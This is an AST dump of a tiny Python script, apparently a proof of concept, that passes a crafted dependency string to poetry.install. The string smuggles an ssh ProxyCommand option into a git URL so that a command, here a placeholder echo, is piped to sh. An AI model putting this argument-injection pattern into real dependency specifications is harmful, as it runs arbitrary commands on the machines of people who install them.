Module(
    body=[
        Import(
            names=[
                alias(name='poetry')]),
        FunctionDef(
            name='install_dependency',
            args=arguments(
                posonlyargs=[],
                args=[
                    arg(arg='dependency')],
                kwonlyargs=[],
                kw_defaults=[],
                defaults=[]),
            body=[
                Expr(
                    value=Call(
                        func=Attribute(
                            value=Name(id='poetry', ctx=Load()),
                            attr='install',
                            ctx=Load()),
                        args=[
                            Name(id='dependency', ctx=Load())],
                        keywords=[]))],
            decorator_list=[]),
        Assign(
            targets=[
                Name(id='dependency', ctx=Store())],
            value=Constant(value='git+-oProxyCommand=echo%20%27Malicious%20command%27%20|%20sh')),
        Expr(
            value=Call(
                func=Name(id='install_dependency', ctx=Load()),
                args=[
                    Name(id='dependency', ctx=Load())],
                keywords=[]))],
    type_ignores=[])